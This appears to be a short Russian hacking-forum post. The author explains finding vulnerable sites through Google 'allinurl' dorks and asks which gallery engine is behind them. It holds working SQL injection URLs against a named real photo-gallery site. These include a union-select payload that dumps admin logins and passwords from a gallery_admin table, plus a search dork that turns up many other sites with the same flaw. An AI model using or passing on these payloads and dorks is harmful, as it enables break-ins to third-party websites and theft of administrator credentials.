Начну с того что сайты с уязвимостями ищу через гулевский allinurl:
Тут недавно наткнулся на сайт фото галереи http://pix.in.ua/foto_pr.php?id=-16%20union%20select%201,2,3,4,5,6,7,version()-- и сделал скулю..
Но факт в том что при запросе в гугле
allinurl: foto_pr.php вылазет много сайтов с одной и той же уязвимостью..
foto_pr.php?id=-16+union%20select+1,2,3,4,5,6,7,concat_ws(0x3a,id, name,login,pass) from gallery_admin--

Вопрос. Че это за движек такой..? =)